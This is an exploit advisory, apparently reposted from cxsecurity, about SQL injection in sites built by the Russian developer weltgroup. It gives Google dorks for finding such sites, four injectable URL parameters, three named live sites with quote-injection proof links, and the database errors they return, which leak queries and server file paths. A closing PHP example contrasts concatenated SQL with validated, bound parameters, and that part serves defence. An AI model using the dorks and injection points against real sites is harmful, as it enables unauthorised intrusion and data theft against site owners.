Chipsa Hosting Дизайн: «Чипса» Разработка сайта: weltgroup Hosting Russia SQL Injection Vulnerability

#################################################################################################

# Exploit Title : Chipsa Hosting Дизайн: «Чипса» Разработка сайта: weltgroup Hosting Russia SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : chipsa.ru ~ weltgroup.ru
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Дизайн: «Чипса» Разработка сайта: weltgroup'' site:ru
intext:''Разработка сайта Weltgroup'' site:ru

# SQL Injection Exploit :

/gallery.php?id=[SQL Injection]
/search.php?more&id=[SQL Injection]
/catalog/[ID-NUMBER]/?group=[SQL Injection]
/search/?producer_code=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

krascor.ru/gallery.php?id=9%27 => [ Proof of Concept ] => archive.is/0XZPz
brakonierov.net/catalog/26/?group=26%27 => [ Proof of Concept ] => archive.is/O1KmR
rosrelief.ru/search.php?more&id=1'

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SELECT name from albums where id=9\'
File: /usr/local/www/apache22/data/modules/siteconfig/functions.php
Line: 307

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' order by id desc limit 0,1' at line 1
select * from partitions where page = ''' order by id desc limit 0,1
File: /home/www/rosrelief.ru/data/www/rosrelief.ru/inc/check_url.inc.php
Line: 31

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11'' group by pr.code, pr.article_id order by c.name' at line 2
select c.code, c.producer, c.name, pr.article_id, c.recipe from catalog c, price pr where c.code=pr.code and c.status='1' and ((c.name like '%%') or (c.mnn like '%%') or (pr.producer like '%%')) and c.country <> '11'' group by pr.code, pr.article_id order by c.name
File: /home/www/brakonierov.net/data/www/brakonierov.net/sites/brakonierov/inc/search_result.php
Line: 28

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
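The first leaked query (`SELECT name from albums where id=9\'`) shows the quote was backslash-escaped but still reached the SQL text, because the value sits in an unquoted numeric position. The sketch below is an added example, not code from the advisory or from the affected sites: it puts that concatenated lookup beside a validated, parameter-bound one. The function names, the sample row and the in-memory SQLite database (standing in for MySQL so it runs offline) are assumptions.

```php
<?php
// Added example: schema and row are constructed; SQLite in memory stands in for MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE albums (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO albums (id, name) VALUES (9, 'Constructed album')");

// "Before": the id is pasted into the SQL text, as in the leaked query.
// addslashes() mimics the backslash seen in the error message; it cannot help
// here because the value is not inside a quoted string literal.
function albumNameConcat(PDO $db, string $rawId): ?string
{
    $sql = "SELECT name FROM albums WHERE id=" . addslashes($rawId);
    $name = $db->query($sql)->fetchColumn();
    return $name === false ? null : $name;
}

// "After": accept only a positive integer, then bind it as a typed parameter.
function albumNameBound(PDO $db, string $rawId): ?string
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // rejected before any SQL is built
    }
    $stmt = $db->prepare("SELECT name FROM albums WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

// Inputs: a normal id, and the id with a trailing quote as shown in the advisory.
foreach (["9", "9'"] as $input) {
    try {
        $before = albumNameConcat($db, $input);
    } catch (PDOException $e) {
        // Log server-side only; never echo the query, file path or line number.
        error_log('albums lookup failed: ' . $e->getMessage());
        $before = '[query failed]';
    }
    $after = albumNameBound($db, $input);
    printf("%-3s before=%s after=%s\n", $input,
        var_export($before, true), var_export($after, true));
}
```

The catch block matters as much as the binding: the responses quoted in the advisory return the full query, file path and line number to the client, which a production site should send to a server-side log instead.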

References:

https://www.cyberizm.org/cyberizm-chipsa-weltgroup-hosting-russia-sql-inj-exploit.html



Copyright 2018, cxsecurity.com

 
